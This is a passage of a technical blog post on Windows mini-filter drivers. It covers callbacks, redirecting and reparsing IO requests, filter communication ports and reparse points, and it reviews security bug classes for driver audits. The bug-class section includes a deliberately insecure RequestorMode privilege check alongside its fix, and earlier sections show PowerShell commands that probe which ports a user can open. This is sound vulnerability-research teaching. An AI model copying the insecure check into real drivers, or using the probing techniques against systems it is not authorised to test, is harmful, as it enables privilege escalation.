    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specifies that it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.
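
As a minimal sketch of this pattern (the context structure and pool tag are hypothetical), the pre-operation callback allocates the context and the post-operation callback consumes and frees it:

// Hypothetical context passed from the pre- to the post-operation callback.
typedef struct _MONITOR_CONTEXT {
    ACCESS_MASK DesiredAccess;
} MONITOR_CONTEXT, *PMONITOR_CONTEXT;

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    UNREFERENCED_PARAMETER(FltObjects);
    PMONITOR_CONTEXT ctx = ExAllocatePoolWithTag(NonPagedPoolNx,
                                                 sizeof(*ctx), 'ctxM');
    if (ctx == NULL)
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    // Capture whatever the post-operation callback will need.
    ctx->DesiredAccess =
        Data->Iopb->Parameters.Create.SecurityContext->DesiredAccess;
    *CompletionContext = ctx;
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}

FLT_POSTOP_CALLBACK_STATUS
PostCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags
) {
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(Flags);
    PMONITOR_CONTEXT ctx = CompletionContext;
    // Use ctx->DesiredAccess together with Data->IoStatus here...
    ExFreePoolWithTag(ctx, 'ctxM');  // Free it to avoid leaking memory.
    return FLT_POSTOP_FINISHED_PROCESSING;
}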

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system had encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data,
                                        PUNICODE_STRING TargetFileName){
  LuafvSetEcp(Data, TargetFileName);
  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;
  ExFreePool(FileObject->FileName.Buffer);
  FileObject->FileName.Buffer = ExAllocatePool(PagedPool,
                                        TargetFileName->Length);
  FileObject->FileName.MaximumLength = TargetFileName->Length;
  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);
  Data->IoStatus.Information = 0;
  Data->IoStatus.Status = STATUS_REPARSE;
  FltSetCallbackDataDirty(Data);
  return FLT_POSTOP_FINISHED_PROCESSING;
}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 an IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.
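
On Windows 7 and later the same post-operation reparse could be written with IoReplaceFileObjectName, which takes care of the buffer management. A minimal sketch under that assumption:

FLT_POSTOP_CALLBACK_STATUS ReparseToTarget(PFLT_CALLBACK_DATA Data,
                                           PUNICODE_STRING TargetFileName) {
    // IoReplaceFileObjectName reallocates the file object's name
    // buffer, replacing the hand-rolled code shown above.
    NTSTATUS status = IoReplaceFileObjectName(Data->Iopb->TargetFileObject,
                                              TargetFileName->Buffer,
                                              TargetFileName->Length);
    if (!NT_SUCCESS(status)) {
        Data->IoStatus.Status = status;
        return FLT_POSTOP_FINISHED_PROCESSING;
    }
    Data->IoStatus.Information = 0;
    Data->IoStatus.Status = STATUS_REPARSE;
    FltSetCallbackDataDirty(Data);
    return FLT_POSTOP_FINISHED_PROCESSING;
}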

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result.

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.
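
For example, a minimal sketch of a pre-operation callback which blocks all write requests outright:

FLT_PREOP_CALLBACK_STATUS
PreWriteOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    // Fail the write; no lower driver ever sees the request.
    Data->IoStatus.Status = STATUS_ACCESS_DENIED;
    Data->IoStatus.Information = 0;
    return FLT_PREOP_COMPLETE;
}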

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using the FltFindExtraCreateParameter API, allowing it to ignore the request. For example, the earlier code showing how LUAFV implements a reparse operation calls LuafvSetEcp, which sets an ECP on the request so that the new create request can be ignored by the driver.
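
A minimal sketch of the check side of this pattern in a pre-create callback (the GUID here is a hypothetical placeholder for the driver's own ECP type):

// Hypothetical GUID identifying this driver's private ECP.
static const GUID MY_ECP_GUID =
{ 0x12345678, 0x1234, 0x1234, { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07 } };

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    UNREFERENCED_PARAMETER(CompletionContext);
    PECP_LIST ecpList = NULL;
    PVOID ecpContext;
    // If our own ECP is attached, this create originated from the
    // driver itself, so ignore it to avoid infinite recursion.
    if (NT_SUCCESS(FltGetEcpListFromCallbackData(FltObjects->Filter, Data,
                                                 &ecpList)) &&
        ecpList != NULL &&
        NT_SUCCESS(FltFindExtraCreateParameter(FltObjects->Filter, ecpList,
                                               &MY_ECP_GUID, &ecpContext,
                                               NULL))) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    // Otherwise process the create as normal...
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}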

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.
if (context->FileObject) {
    Data->Iopb->TargetFileObject = context->FileObject;
    FltSetCallbackDataDirty(Data);
    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there are multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;
FltBuildDefaultSecurityDescriptor(
  &SecurityDescriptor,
  FLT_PORT_ALL_ACCESS
);

UNICODE_STRING Name;
RtlInitUnicodeString(&Name, L"\\FilterPortName");
OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;
FltCreateCommunicationPort(
  Filter,
  &Port,
  &ObjAttr,
  NULL,
  ConnectNotifyCallback,
  DisconnectNotifyCallback,
  MessageNotifyCallback,
  100
);

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS
(*PFLT_CONNECT_NOTIFY) (
      PFLT_PORT ClientPort,
      PVOID ServerPortCookie,
      PVOID ConnectionContext,
      ULONG SizeOfContext,
      PVOID *ConnectionPortCookie
      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.
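
From user mode, connecting and sending a message takes only a few lines of C. This is a minimal sketch assuming the port name from the earlier example and using the FilterSendMessage API described below; the context and message contents are arbitrary placeholders:

#include <windows.h>
#include <fltuser.h>

#pragma comment(lib, "fltlib.lib")

int main(void) {
    // Hypothetical connection context; a real driver defines its own format.
    BYTE context[] = { 0, 1, 2, 3 };
    HANDLE port;
    HRESULT hr = FilterConnectCommunicationPort(
        L"\\FilterPortName",   // Port name from the earlier example.
        0,                     // Options.
        context,               // Context verified by the connect callback.
        sizeof(context),
        NULL,                  // Security attributes.
        &port);
    if (FAILED(hr))
        return 1;
    BYTE input[] = { 0xAA, 0xBB, 0xCC, 0xDD };
    BYTE output[0x100];
    DWORD returned;
    hr = FilterSendMessage(port, input, sizeof(input),
                           output, sizeof(output), &returned);
    CloseHandle(port);
    return FAILED(hr) ? 1 : 0;
}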

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName
----                                      --------
storqosfltport                            FilterConnectionPort
MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort
MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort
WcifsPort                                 FilterConnectionPort
MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort
BindFltPort                               FilterConnectionPort
MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort
CLDMSGPORT                                FilterConnectionPort
MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ |
Where-Object TypeName -eq "FilterConnectionPort"
PS> foreach($port in $ports.Name) {
    Write-Host "\$port"
    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}
}
\BindFltPort
Exception: "(0x80070005) - Access is denied."
\CLDMSGPORT
Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT
Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort
    ObjectHeader: ffffb487447ff890 (new version)
    HandleCount: 1  PointerCount: 4
    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT
0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)
(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0
0: kd> !sd 0xffff8a888dccb0a0 1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x9004
            SE_DACL_PRESENT
            SE_DACL_PROTECTED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    :
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x1c
->Dacl    : ->AceCount   : 0x1
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)
->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(
  HANDLE  hPort,
  LPVOID  lpInBuffer,
  DWORD   dwInBufferSize,
  LPVOID  lpOutBuffer,
  DWORD   dwOutBufferSize,
  LPDWORD lpBytesReturned
);

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS
(*PFLT_MESSAGE_NOTIFY) (
      IN PVOID PortCookie,
      IN PVOID InputBuffer OPTIONAL,
      IN ULONG InputBufferLength,
      OUT PVOID OutputBuffer OPTIONAL,
      IN ULONG OutputBufferLength,
      OUT PULONG ReturnOutputBufferLength
      );

The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method, the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.
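
A minimal sketch of a message notification callback which treats both buffers as untrusted (the command/reply format is hypothetical); since the pointers reference user-mode memory, every access should be wrapped in structured exception handling:

NTSTATUS MessageNotifyCallback(
    PVOID PortCookie,
    PVOID InputBuffer,
    ULONG InputBufferLength,
    PVOID OutputBuffer,
    ULONG OutputBufferLength,
    PULONG ReturnOutputBufferLength
) {
    UNREFERENCED_PARAMETER(PortCookie);
    *ReturnOutputBufferLength = 0;
    if (InputBuffer == NULL || InputBufferLength < sizeof(ULONG))
        return STATUS_INVALID_PARAMETER;
    __try {
        // Both buffers point into user-mode memory, so accesses can
        // fault at any time and must be guarded with SEH.
        ULONG command = *(volatile ULONG*)InputBuffer;
        if (OutputBuffer != NULL && OutputBufferLength >= sizeof(ULONG)) {
            *(volatile ULONG*)OutputBuffer = command + 1;  // Hypothetical reply.
            *ReturnOutputBufferLength = sizeof(ULONG);
        }
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        return GetExceptionCode();
    }
    return STATUS_SUCCESS;
}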

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(
  PFLT_FILTER    Filter,
  PFLT_PORT      *ClientPort,
  PVOID          SenderBuffer,
  ULONG          SenderBufferLength,
  PVOID          ReplyBuffer,
  PULONG         ReplyLength,
  PLARGE_INTEGER Timeout
);

If there’s currently no waiting user mode process the API can wait a specified timeout until the application calls FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.
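
A minimal user-mode sketch of this get/reply loop (the message and reply payloads are hypothetical; a real driver defines its own layout):

// Hypothetical message and reply layouts following the headers.
typedef struct _DRIVER_MESSAGE {
    FILTER_MESSAGE_HEADER Header;
    ULONG Payload;
} DRIVER_MESSAGE;

typedef struct _DRIVER_REPLY {
    FILTER_REPLY_HEADER Header;
    ULONG Payload;
} DRIVER_REPLY;

void MessageLoop(HANDLE port) {
    for (;;) {
        DRIVER_MESSAGE msg;
        // Blocks until the driver calls FltSendMessage.
        if (FAILED(FilterGetMessage(port, &msg.Header, sizeof(msg), NULL)))
            break;
        DRIVER_REPLY reply = { 0 };
        reply.Header.Status = 0;  // STATUS_SUCCESS
        // The message ID correlates the reply with the kernel's message.
        reply.Header.MessageId = msg.Header.MessageId;
        reply.Payload = msg.Payload + 1;
        if (FAILED(FilterReplyMessage(port, &reply.Header, sizeof(reply))))
            break;
    }
}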

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests.  However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.

#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, \
                                     0x801,                   \
                                     METHOD_BUFFERED,         \
                                     FILE_ANY_ACCESS)

FLT_PREOP_CALLBACK_STATUS
PreFsControlOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;
    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,
        ps->DeviceIoControl.Buffered.OutputBufferLength);
    // Swap only up to the midpoint, otherwise the buffer ends up unchanged.
    for (ULONG i = 0; i < length / 2; ++i)
    {
        char tmp = buffer[i];
        buffer[i] = buffer[length - i - 1];
        buffer[length - i - 1] = tmp;
    }
    Data->IoStatus.Status = STATUS_SUCCESS;
    Data->IoStatus.Information = length;
    return FLT_PREOP_COMPLETE;
}

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it correctly handles all buffer types if it wants to implement its own control codes.

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete reparse points using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way for a mini-filter driver to set and delete a file’s reparse buffer is through the FltTagFile (and FltTagFileEx) and FltUntagFile APIs. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it’s in the open reparse list. If so, instead of returning STATUS_REPARSE, the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and a success NT status code is returned. The filter driver can then check for the flag in the post-create callback; if set it can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT, and handle it accordingly.

The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the REPARSE_DATA_BUFFER structure which will be written to the file system by calling the kernel API FsRtlValidateReparsePointBuffer. The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.
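
As a sketch of the kind of validation a driver needs to do itself (the tag and payload layout here are hypothetical), every field read out of the DataBuffer should be bounds checked against ReparseDataLength:

// Hypothetical tag and payload layout for a filter's private reparse format.
#define IO_REPARSE_TAG_EXAMPLE 0x0000BEEF

typedef struct _EXAMPLE_REPARSE_DATA {
    ULONG Version;
    ULONG BackingFileNameLength;  // In bytes, must fit within the buffer.
    WCHAR BackingFileName[ANYSIZE_ARRAY];
} EXAMPLE_REPARSE_DATA, *PEXAMPLE_REPARSE_DATA;

NTSTATUS ParseReparseBuffer(PREPARSE_DATA_BUFFER Buffer) {
    if (Buffer->ReparseTag != IO_REPARSE_TAG_EXAMPLE)
        return STATUS_NOT_SUPPORTED;
    // FsRtlValidateReparsePointBuffer only performed basic length checks,
    // so every field read from DataBuffer is untrusted.
    if (Buffer->ReparseDataLength <
        FIELD_OFFSET(EXAMPLE_REPARSE_DATA, BackingFileName))
        return STATUS_INVALID_PARAMETER;
    PEXAMPLE_REPARSE_DATA data =
        (PEXAMPLE_REPARSE_DATA)Buffer->GenericReparseBuffer.DataBuffer;
    if (data->BackingFileNameLength >
        Buffer->ReparseDataLength -
        FIELD_OFFSET(EXAMPLE_REPARSE_DATA, BackingFileName))
        return STATUS_INVALID_PARAMETER;
    // Now safe to read BackingFileNameLength bytes of BackingFileName.
    return STATUS_SUCCESS;
}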

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list; I’m sure there are some novel bug classes that I don’t know about which are missing from this list. That’s why it’s worth describing this process in more detail, so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from github. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common and garden variety memory safety hazards

Being native C code you can expect the same sorts of issues you’d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to read arbitrary files on disk such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege,
                                Data->RequestorMode)) {
        Data->IoStatus.Status = STATUS_ACCESS_DENIED;
        return FLT_PREOP_COMPLETE;
    }
    // Perform some privileged action.
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}

The example above shows misuse of the RequestorMode field. It passes it directly to SeSinglePrivilegeCheck; if the field indicates the call came from the kernel then the privilege check will always return TRUE, meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.
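
A minimal sketch of the corrected check, downgrading the effective requestor mode when access checking has been forced:

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    KPROCESSOR_MODE mode = Data->RequestorMode;
    // If access checking was forced on the handle, treat the request
    // as if it came from user mode even if RequestorMode is KernelMode.
    if (Data->Iopb->OperationFlags & SL_FORCE_ACCESS_CHECK) {
        mode = UserMode;
    }
    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, mode)) {
        Data->IoStatus.Status = STATUS_ACCESS_DENIED;
        return FLT_PREOP_COMPLETE;
    }
    // Perform some privileged action.
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}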

Driver and Kernel IO Operation Mismatch

